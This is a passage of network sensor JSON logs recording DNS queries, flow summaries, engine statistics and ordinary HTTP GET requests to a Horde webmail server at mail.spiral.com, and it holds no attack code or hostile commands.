{"timestamp":"2020-02-29T00:23:53.345755+0000","flow_id":1432799732666899,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36710,"proto":"UDP","dns":{"type":"answer","id":3775,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:53.491588+0000","flow_id":1124622944265220,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52982,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090}} {"timestamp":"2020-02-29T00:23:57.000378+0000","flow_id":171140185030946,"event_type":"flow","src_ip":"192.168.10.122","src_port":35507,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:55.950562+0000","end":"2020-02-29T00:18:56.058921+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:58.492418+0000","flow_id":1124622944265220,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52982,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47021,"tx_id":0}} {"timestamp":"2020-02-29T00:23:59.000189+0000","event_type":"stats","stats":{"uptime":15091,"capture":{"kernel_packets":140249,"kernel_drops":0},"decoder":{"pkts":140266,"bytes":96292218,"invalid":195,"ipv4":138691,"ipv6":10,"ethernet":140266,"raw":0,"null":0,"sll":0,"tcp":133137,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2862,"new_pruned":17,"est_pruned":2509,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":16523,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} {"timestamp":"2020-02-29T00:24:01.000154+0000","flow_id":1273696944968040,"event_type":"flow","src_ip":"192.168.10.122","src_port":38608,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:00.250216+0000","end":"2020-02-29T00:19:00.358727+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:04.000676+0000","flow_id":97064884588838,"event_type":"flow","src_ip":"192.168.10.122","src_port":42079,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:03.020774+0000","end":"2020-02-29T00:19:03.129636+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:06.000224+0000","event_type":"stats","stats":{"uptime":15098,"capture":{"kernel_packets":140267,"kernel_drops":0},"decoder":{"pkts":140273,"bytes":96292584,"invalid":195,"ipv4":138694,"ipv6":10,"ethernet":140273,"raw":0,"null":0,"sll":0,"tcp":133140,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092448},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2862,"new_pruned":17,"est_pruned":2512,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":0,"flows_timeout":3,"flows_timeout_inuse":2,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":15861,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} {"timestamp":"2020-02-29T00:24:06.002115+0000","flow_id":181357912881723,"event_type":"flow","src_ip":"192.168.10.122","src_port":38040,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:05.227899+0000","end":"2020-02-29T00:19:05.336483+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:08.000606+0000","flow_id":767745518388486,"event_type":"flow","src_ip":"192.168.10.81","src_port":52970,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":4,"bytes_toserver":338,"bytes_toclient":921,"start":"2020-02-29T00:23:02.050438+0000","end":"2020-02-29T00:23:07.279817+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"13","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:08.000821+0000","flow_id":769897281519196,"event_type":"flow","src_ip":"192.168.10.122","src_port":56980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:06.949852+0000","end":"2020-02-29T00:19:07.058440+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:12.000443+0000","flow_id":2024272545427820,"event_type":"flow","src_ip":"192.168.10.122","src_port":58238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:11.635244+0000","end":"2020-02-29T00:19:11.743356+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:12.000847+0000","flow_id":1783625527824888,"event_type":"flow","src_ip":"192.168.10.122","src_port":51082,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:11.823800+0000","end":"2020-02-29T00:19:11.928718+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:13.000168+0000","event_type":"stats","stats":{"uptime":15105,"capture":{"kernel_packets":140267,"kernel_drops":0},"decoder":{"pkts":140273,"bytes":96292584,"invalid":195,"ipv4":138694,"ipv6":10,"ethernet":140273,"raw":0,"null":0,"sll":0,"tcp":133140,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091584},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2863,"new_pruned":17,"est_pruned":2514,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":14537,"memcap_state":0,"memcap_global":0},"http":{"memuse":480,"memcap":0}}} {"timestamp":"2020-02-29T00:24:18.000843+0000","flow_id":1934138362150047,"event_type":"flow","src_ip":"192.168.10.122","src_port":46219,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:17.310431+0000","end":"2020-02-29T00:19:17.418887+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:18.001101+0000","flow_id":836147152779304,"event_type":"flow","src_ip":"192.168.10.122","src_port":35956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:17.489512+0000","end":"2020-02-29T00:19:17.594290+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:19.002380+0000","flow_id":1779901807041841,"event_type":"flow","src_ip":"192.168.10.81","src_port":52976,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":7,"bytes_toserver":913,"bytes_toclient":3914,"start":"2020-02-29T00:23:13.564529+0000","end":"2020-02-29T00:23:18.577333+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:20.000579+0000","event_type":"stats","stats":{"uptime":15112,"capture":{"kernel_packets":140267,"kernel_drops":0},"decoder":{"pkts":140273,"bytes":96292584,"invalid":195,"ipv4":138694,"ipv6":10,"ethernet":140273,"raw":0,"null":0,"sll":0,"tcp":133140,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7090432},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2882,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2898,"synack":2889,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":778,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2863,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":6,"flows_notimeout":1,"flows_timeout":5,"flows_timeout_inuse":3,"flows_removed":2,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":400,"memcap":0}}} {"timestamp":"2020-02-29T00:24:21.000189+0000","flow_id":1553466836230670,"event_type":"flow","src_ip":"192.168.10.81","src_port":52978,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":16,"pkts_toclient":16,"bytes_toserver":3253,"bytes_toclient":13426,"start":"2020-02-29T00:23:13.565774+0000","end":"2020-02-29T00:23:19.064430+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:21.000541+0000","flow_id":1327585916188998,"event_type":"flow","src_ip":"192.168.10.81","src_port":52974,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":30,"pkts_toclient":38,"bytes_toserver":7697,"bytes_toclient":42976,"start":"2020-02-29T00:23:13.555334+0000","end":"2020-02-29T00:23:19.063679+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:21.000749+0000","flow_id":1632747637355106,"event_type":"flow","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":52,"pkts_toclient":69,"bytes_toserver":11289,"bytes_toclient":73773,"start":"2020-02-29T00:23:10.307810+0000","end":"2020-02-29T00:23:19.067296+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:23.000496+0000","flow_id":2025049950055944,"event_type":"flow","src_ip":"192.168.10.130","src_port":34276,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":36,"pkts_toclient":64,"bytes_toserver":3765,"bytes_toclient":80837,"start":"2020-02-29T00:23:08.323080+0000","end":"2020-02-29T00:23:13.392667+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:26.000704+0000","flow_id":96399181527716,"event_type":"flow","src_ip":"192.168.10.81","src_port":52980,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1110,"start":"2020-02-29T00:23:20.440996+0000","end":"2020-02-29T00:23:25.669829+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:27.000194+0000","event_type":"stats","stats":{"uptime":15119,"capture":{"kernel_packets":140276,"kernel_drops":0},"decoder":{"pkts":140360,"bytes":96376290,"invalid":195,"ipv4":138781,"ipv6":10,"ethernet":140360,"raw":0,"null":0,"sll":0,"tcp":133227,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7089280},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2868,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":80,"memcap":0}}} {"timestamp":"2020-02-29T00:24:34.002570+0000","event_type":"stats","stats":{"uptime":15126,"capture":{"kernel_packets":140362,"kernel_drops":0},"decoder":{"pkts":140368,"bytes":96376832,"invalid":195,"ipv4":138787,"ipv6":10,"ethernet":140368,"raw":0,"null":0,"sll":0,"tcp":133233,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2869,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":80,"memcap":0}}} {"timestamp":"2020-02-29T00:24:42.000226+0000","event_type":"stats","stats":{"uptime":15134,"capture":{"kernel_packets":140362,"kernel_drops":0},"decoder":{"pkts":140368,"bytes":96376832,"invalid":195,"ipv4":138787,"ipv6":10,"ethernet":140368,"raw":0,"null":0,"sll":0,"tcp":133233,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2869,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":80,"memcap":0}}} {"timestamp":"2020-02-29T00:24:47.000550+0000","flow_id":206771237029553,"event_type":"flow","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:46.460465+0000","end":"2020-02-29T00:19:46.569640+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:47.000963+0000","flow_id":2245338809397529,"event_type":"flow","src_ip":"192.168.10.122","src_port":51086,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:19:46.684313+0000","end":"2020-02-29T00:19:46.910017+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:48.001081+0000","flow_id":302055086514181,"event_type":"flow","src_ip":"192.168.10.122","src_port":54089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:19:46.942085+0000","end":"2020-02-29T00:19:47.309545+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:48.328496+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53108,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067}} {"timestamp":"2020-02-29T00:24:48.420446+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53108,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":5873,"tx_id":0}} {"timestamp":"2020-02-29T00:24:48.424060+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141}} {"timestamp":"2020-02-29T00:24:48.425400+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53110,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/mozilla.css","state":"CLOSED","stored":false,"size":173,"tx_id":0}} {"timestamp":"2020-02-29T00:24:48.428962+0000","flow_id":2226118850538449,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53114,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236}} {"timestamp":"2020-02-29T00:24:48.430576+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005}} 